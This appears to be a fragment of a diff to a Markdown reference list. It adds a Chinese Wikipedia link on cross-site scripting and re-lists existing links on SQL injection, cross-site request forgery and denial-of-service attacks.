-- [维基百科：SQL 注入攻击](https://zh.wikipedia.org/wiki/SQL%E8%B3%87%E6%96%99%E9%9A%B1%E7%A2%BC%E6%94%BB%E6%93%8A)
-- [维基百科：跨站点请求伪造](https://zh.wikipedia.org/wiki/%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0)
-- [维基百科：拒绝服务攻击](https://zh.wikipedia.org/wiki/%E9%98%BB%E6%96%B7%E6%9C%8D%E5%8B%99%E6%94%BB%E6%93%8A)
+- [维基百科：跨站脚本](https://zh.wikipedia.org/wiki/%E8%B7%A8%E7%B6%B2%E7%AB%99%E6%8C%87%E4%BB%A4%E7%A2%BC)
+- [维基百科：SQL 注入攻击](https://zh.wikipedia.org/wiki/SQL%E8%B3%87%E6%96%99%E9%9A%B1%E7%A2%BC%E6%94%BB%E6%93%8A)
+- [维基百科：跨站点请求伪造](https://zh.wikipedia.org/wiki/%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0)
+- [维基百科：拒绝服务攻击](https://zh.wikipedia.org/wiki/%E9%98%BB%E6%96%B7%E6%9C%8D%E5%8B%99%E6%94%BB%E6%93%8A)